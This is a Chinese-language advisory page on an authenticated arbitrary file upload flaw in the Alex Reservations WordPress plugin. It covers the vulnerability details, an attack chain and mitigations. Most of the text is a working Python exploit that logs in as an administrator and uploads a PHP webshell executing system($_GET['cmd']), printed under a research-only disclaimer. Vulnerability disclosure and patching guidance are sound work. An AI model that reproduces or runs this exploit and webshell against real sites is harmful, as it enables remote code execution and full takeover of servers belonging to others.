CVE-2025-12399 WordPress Alex Reservations插件任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-12399

漏洞类型

任意文件上传

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Alex Reservations: Smart Restaurant Booking WordPress插件

漏洞概述

CVE-2025-12399是WordPress平台Alex Reservations: Smart Restaurant Booking插件中的一个高危安全漏洞。该插件专为餐厅预订系统设计，在全球范围内被广泛使用。漏洞根源在于插件的REST API端点/wp-json/srr/v1/app/upload/file存在严重的文件类型验证缺陷。攻击者利用此漏洞可以绕过服务器端的安全检查，上传任意类型的文件到目标服务器。由于WordPress插件通常具有较高的系统权限，成功上传恶意文件（如PHP脚本）后，攻击者可实现远程代码执行(RCE)，完全控制受影响的网站服务器。漏洞影响范围涵盖2.2.3及之前所有版本，要求攻击者具备管理员级别或更高的账户权限。尽管需要认证，但一旦被利用，将导致严重的机密性、完整性和可用性损失。漏洞由Wordfence安全团队于2025年11月8日披露，建议受影响的用户立即采取修复措施。

技术细节

漏洞位于Alex Reservations插件的UploadFileController.php文件中（第11行附近）。该控制器处理文件上传请求时，未对上传文件的MIME类型和扩展名进行充分的服务器端验证。攻击者可通过构造恶意POST请求到REST API端点/wp-json/srr/v1/app/upload/file，利用认证的管理员账户上传任意文件。攻击流程包括：1) 攻击者获取目标WordPress站点管理员账户凭据；2) 构造包含恶意文件的HTTP POST请求，目标指向REST API上传端点；3) 服务器端代码未正确校验文件类型，允许.php等可执行文件上传；4) 上传成功后，攻击者可通过直接访问上传文件路径执行任意PHP代码。由于插件注册了REST API路由，即使WordPress站点的上传目录有常规限制，插件自定义的上传处理逻辑可能绕过这些限制。修复版本为2.2.4，主要通过添加严格的文件类型白名单验证机制来解决此问题。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标WordPress站点，确认安装了Alex Reservations插件，并确定插件版本<=2.2.3

STEP 2

2. 获取管理员权限

攻击者通过社会工程、凭据泄露或其他方式获取WordPress站点管理员级别或更高的账户凭据

STEP 3

3. 构造恶意请求

攻击者构造包含恶意文件的HTTP POST请求，目标指向/wp-json/srr/v1/app/upload/file REST API端点

STEP 4

4. 文件上传

利用插件缺少文件类型验证的缺陷，上传包含恶意PHP代码的文件（如webshell）到服务器

STEP 5

5. 远程代码执行

攻击者通过访问上传的恶意文件路径，执行任意系统命令，实现对服务器的完全控制

STEP 6

6. 持久化控制

攻击者可进一步植入后门、窃取敏感数据或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12399 PoC - Alex Reservations Arbitrary File Upload
# Target: WordPress site with Alex Reservations plugin <= 2.2.3

def exploit_file_upload(target_url, username, password, file_content):
    """
    Exploit for CVE-2025-12399: Arbitrary file upload in Alex Reservations plugin
    
    Args:
        target_url: Target WordPress site URL
        username: WordPress administrator username
        password: WordPress administrator password
        file_content: Content of the file to upload
    
    Returns:
        dict: Response information
    """
    
    # Setup session
    session = requests.Session()
    
    # WordPress login to get authentication cookies
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    print(f"[*] Logging in to {target_url}...")
    response = session.post(login_url, data=login_data, allow_redirects=False)
    
    if 'wordpress_logged_in' not in session.cookies:
        print("[-] Authentication failed!")
        return None
    
    print("[+] Authentication successful!")
    
    # Prepare malicious file upload
    upload_url = f"{target_url}/wp-json/srr/v1/app/upload/file"
    
    files = {
        'file': ('shell.php', file_content, 'application/x-php')
    }
    
    print(f"[*] Uploading malicious file to {upload_url}...")
    
    try:
        response = session.post(upload_url, files=files, timeout=30)
        
        if response.status_code == 200:
            print("[+] File upload appears successful!")
            print(f"[*] Response: {response.text}")
            return response.json()
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
            print(f"[*] Response: {response.text}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return None

# Example PHP shell content
php_shell = "<?php\nif(isset($_GET['cmd'])){\n    echo '<pre>';\n    system($_GET['cmd']);\n    echo '</pre>';\n}\n?>"

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-12399.py <target_url> <username> <password>")
        print("Example: python cve-2025-12399.py http://example.com admin password123")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_file_upload(target, user, pwd, php_shell)

影响范围

Alex Reservations: Smart Restaurant Booking <= 2.2.3

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用Alex Reservations插件；2) 使用Web服务器配置阻止/wp-json/srr/v1/app/upload/file端点的访问；3) 在.htaccess或nginx配置中禁止上传目录执行PHP文件；4) 加强对管理员账户的安全防护，启用双因素认证；5) 监控日志中的异常REST API请求。同时建议尽快规划并执行插件升级，因为临时缓解措施可能影响插件的正常功能。